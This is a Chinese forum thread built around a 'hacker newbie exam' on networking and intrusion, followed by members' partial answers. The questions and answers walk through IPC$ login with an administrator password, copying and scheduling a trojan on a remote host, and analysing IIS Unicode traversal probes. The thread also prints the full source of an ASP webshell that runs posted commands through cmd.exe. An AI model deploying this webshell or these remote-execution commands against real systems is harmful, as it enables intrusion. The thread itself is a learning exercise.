一份黑客菜鸟试卷

一、 http://192.168.0.1 http://xyz.3322.org http://3232235521 三个连接指向同一目标网站，那么它们分别是什么意义？ 二、 常用端口识别 20 21 23 25 80 110 139 443 445 三、 试述下列命令作用 c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator” c:\>net use z: \\211.87.194.121\c$ c:\>net time \\211.87.194.121 c:\>copy abc.exe \\211.87.194.121\admin$\system32 四、 试述下列命令的区别，如何防止该命令在本地或远程运行 c:\>at \\211.87.194.121 21:05 abc.exe c:\>at 21:05 \\211.87.194.121\admin$\system32\abc.exe 五、 W3SVC日志是什么？分析下面这段日志。 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 - 分析我酌情给分。 六、 netstat命令有何作用，举出两个参数进行说明。 七、 试述木马的一些基本特征。 八、 如何利用脚本实现对ftp的自动操作？ 九、 下面是一个ASP木马，请找出支持这一程序的关键点。 <%@ Language=VBScript %> <% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") szCMD = Request.Form(".CMD") If (szCMD <> "") Then szTempFile = "C:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %>

" method="POST">

 
<% 
If (IsObject(oFile)) Then 
On Error Resume Next 
Response.Write Server.HTMLEncode(oFile.ReadAll) 
oFile.Close 
Call oFileSys.DeleteFile(szTempFile, True) 
End If 
%> 
 
 
十、 
存在IIS或CGI漏洞，并对脚本有执行权限，如何进行入侵？（只要求叙述到如何上传文件，其他思路会酌情给分） 
那么，如何在不打补丁的情况下避免这种攻击的发生？ 
十一、OSI模型中哪一层上有协议？分别是什么？ 
十二、观察ping命令的返回包的TTL值，可以了解到什么？ 
十三、从网关得到采样 
目标 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3646 
目标 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3647 
目标 IP 192.168.0.1 端口69 源 IP　192.168.0.3 端口 69 
请问 这可能是什么样的会话，采用什么协议，进行什么样的作业？ 
十四、谈谈你对hacker和网络安全的认识 

A-MD wrote: 
一、 
http://192.168.0.1网站的IP,是个内网IP哦 
http://xyz.3322.org网站的FQDN名 
http://3232235521 ？？？ 
三个连接指向同一目标网站，那么它们分别是什么意义？ 
二、 
常用端口识别 
20 21 23 
25 80 110 
139 443 445 
三、 
试述下列命令作用 
c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator” 以用户administrator密码123456建立与211.87.194.121的IPC$连接，成功后………… 
c:\>net use z: \\211.87.194.121\c$ 把211.87.194.121的C盘映射为本地的Z盘，以后用211.87.194.121的C盘就像是用本地硬盘一样了 
c:\>net time \\211.87.194.121 看211.87.194.121上现在的时间 
c:\>copy abc.exe \\211.87.194.121\admin$\system32 
把abc.exe （大多是木马服务端）文件复制到211.87.194.121的X：\windows\system32里面（X为系统盘） 
这个大题是最有把握的，原因吗………… 
四、 
试述下列命令的区别，如何防止该命令在本地或远程运行 
c:\>at \\211.87.194.121 21:05 abc.exe 211.87.194.121上的时间为21:05时运行abc.exe 
c:\>at 21:05 \\211.87.194.121\admin$\system32\abc.exe 本地时间为21:05时运行211.87.194.121上的abc.exe 
只有在启动了schedule服务后at命令才能被执行 
五、 
W3SVC日志是什么？分析下面这段日志。 INTERNET信息服务WWW日志 
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 - 
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 - 
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 - 
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 - 
分析我酌情给分。 
具体每行的情况不是很清楚，好像是有人利用UNICODE漏洞看能不能用DIR命令获得211.87.215.81上的文件列表，如果成功的话就会有进一步的动作了 
六、 
netstat命令有何作用，举出两个参数进行说明。 
七、 
试述木马的一些基本特征。 
CS模型，开机自启等 
八、 
如何利用脚本实现对ftp的自动操作？ 
九、 
下面是一个ASP木马，请找出支持这一程序的关键点。 
<%@ Language=VBScript %> 
<% 
Dim oScript 
Dim oScriptNet 
Dim oFileSys, oFile 
Dim szCMD, szTempFile 
On Error Resume Next 
Set oScript = Server.CreateObject("WSCRIPT.SHELL") 
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 
szCMD = Request.Form(".CMD") 
If (szCMD <> "") Then 
szTempFile = "C:\" & oFileSys.GetTempName( ) 
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 
End If 
%> 
 
 
" method="POST"> 
 
 
 
 
<% 
If (IsObject(oFile)) Then 
On Error Resume Next 
Response.Write Server.HTMLEncode(oFile.ReadAll) 
oFile.Close 
Call oFileSys.DeleteFile(szTempFile, True) 
End If 
%> 
 
 
十、 
存在IIS或CGI漏洞，并对脚本有执行权限，如何进行入侵？（只要求叙述到如何上传文件，其他思路会酌情给分） 
那么，如何在不打补丁的情况下避免这种攻击的发生？ 
十一、OSI模型中哪一层上有协议？分别是什么？ 
应用层：TELNET,SMTP,HTTP,FTP,DNS 
传输层：TCP,UDP,SPX 
网络层：IP,IPX,ARP,ICMP,RARP 
十二、观察ping命令的返回包的TTL值，可以了解到什么？ 
可以知道对方把信息传过来时经过了几个路由器 
十三、从网关得到采样 
目标 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3646 
目标 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3647 
目标 IP 192.168.0.1 端口69 源 IP　192.168.0.3 端口 69 
请问 这可能是什么样的会话，采用什么协议，进行什么样的作业？ 
192.168.0.1是一个WWW服务器，192.168.0.3正在访问，并且是开了两个网页，HTTP协议，最后一个端口69的不知道 

看的懂一些,大多都不懂,所以我是菜鸟!

一、
http://192.168.0.1
http://xyz.3322.org
http://3232235521
三个连接指向同一目标网站，那么它们分别是什么意义？
第一个是目标服务器的ip地址，第二个则是其域名地址，其真正ip则需要dns服务来解析。第三个则为目标ip的10进制形式
二、
常用端口识别
20 21 23
25 80 110
139 443 445
20 ftp文本传输端口
21 ftp二进制流传输端口
23 telnet服务
25 smtp
80 web服务
139 netbios
学习完计算机网络，至少会懂一半.

下面引用由nainiou在 2006/01/02 08:56pm 发表的内容：
看的懂一些,大多都不懂,所以我是菜鸟!

那些不懂，说出来大家一起讨论。

我不懂，是个菜菜小鸟。

才勉强能回答5道吧．．．．
答对几道才算过关啊？？

妈妈,这个也叫菜鸟做的啊!偶那不成小小菜鸟了,偶把偶会说的说下吧,其他不知道楼主看给几分吧!
第一题,第一个是IP地址啊.下面那个是不是网址,第3个一串数字的不懂
第二题,23是TELNET.80是HTTP,其他不清楚
第三题,第一段是进到那个IP的机器里.拥护是超级,密码为123456,后面几个没试过哦
第四和第五不知道
第六题,那个命令是浏览本机目前开的端口号的吧.防止木马有点作用
第七题,特征是隐蔽.控制力强,传播比病毒烂点CS模式是服务器/客户机 开机自启就不清楚了
接下去的都不知道了

只知道第一题和第二题的部分

一、
http://192.168.0.1  目标网站IP！
http://xyz.3322.org   目标网站域名
http://3232235521  ？？
三个连接指向同一目标网站，那么它们分别是什么意义？
二、
常用端口识别
21 80 139  443 不是黑客就用这几个
三、
试述下列命令作用
c:\>net use \\211.87.194.121\ipc&#36; “123456”/user:”administrator”
用账号administrator密码123456与211.87.794.121建立ICP&#36;连接
c:\>net use z: \\211.87.194.121\c&#36;
映射211.87.194.121的C盘为本地Z盘
c:\>net time \\211.87.194.121
查看211.87.194.121的时间
c:\>copy abc.exe \\211.87.194.121\admin&#36;\system32
拷贝ABC.EXE到211.87.194.121的SYSTEM32下
四、
试述下列命令的区别，如何防止该命令在本地或远程运行
c:\>at \\211.87.194.121 21:05 abc.exe
当目标机211.87.194.121到21：05时运行ABC.EXE
c:\>at 21:05 \\211.87.194.121\admin&#36;\system32\abc.exe
当本地时间到21：05运行目标机211.87.194.121SYSTEM32目录下的ABC.EXE
五、
W3SVC日志是什么？分析下面这段日志。
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 -
分析我酌情给分。
这个没有注意过！不懂！
六、
netstat命令有何作用，举出两个参数进行说明。
查询网路资料
七、
试述木马的一些基本特征。
以窃取中马者密码为主，
八、
如何利用脚本实现对ftp的自动操作？
半桶水响！

只能答上6题~~

我不懂，是个菜菜小鸟。

...........